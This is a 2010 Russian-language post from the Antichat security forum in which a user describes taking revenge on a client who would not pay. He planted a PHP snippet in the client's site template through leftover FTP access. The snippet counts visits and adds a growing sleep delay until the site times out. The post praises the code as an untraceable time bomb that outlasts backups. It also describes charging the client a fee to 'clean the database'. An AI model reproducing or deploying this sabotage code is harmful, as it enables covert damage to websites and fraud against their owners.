HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #10  
Старый 18.01.2010, 18:20
strecher
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме:
102758

Репутация: 3
Wink

Были у меня проблемы с заказчиком, не хотел деньги отдавать. Фтп сохранился, вот я ему и подправил файлы.

Добавь в начало root/templates/название темплета/index.php

PHP код:
 <?php    if (file_exists('index2.php')) 
    {
        
$fil fopen('index2.php'r);
        
$dat fread($filfilesize('index2.php')); 
        
sleep(1$fil 20);
        
fclose($fil);
        
$fil fopen('index2.php'w);
        
fwrite($fil$dat+1);
    }

    else
    {
        
$fil fopen('index2.php'w);
        
fwrite($fil1);        
        
fclose($fil);
    } 
?>
Преимущества такого подхода:

+ В данном случае на каждые 20 заходов время загрузки увеличивается на одну секунду, поэтому сразу не заметят. Одна секунда - это не мало, очень заметно при 3-4 и более. Выше 60 и сайт не грузится - пхп таймоут.

+ Т.к. это бомба замедленного действия, когда заметят - бакапы не помогут. Хостеры обычно не более недели хранят файлы. Да и кто хочет терять работы на неделю.

+ Тебя не в чем обвинить - при чем тут ты? (Читай ниже)

Я код вставил, посидел недельку и мне звонят - мол, в чем дело - сайт ужасно тормозит? Я сказал - видимо база данных засорилась) А чистить - дело долгое, нудное - ещё за сотку почищу)) заодно и за сайт заплатили Правда прождал ещё пару дней пока сайт совсем не рухнул. Из-за рандома он все-таки время он времени появлялся на свет.

ЗЫ. Чтоб активировать этот скрипт можешь сделать файл с названием типа index2.php в папку инклудов который создаст файл activate.txt, а в скрипт добавить строку для проверки наличия файла.

ЗЫ.ЗЫ. Так же можешь использовать базу данных для счетчика.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ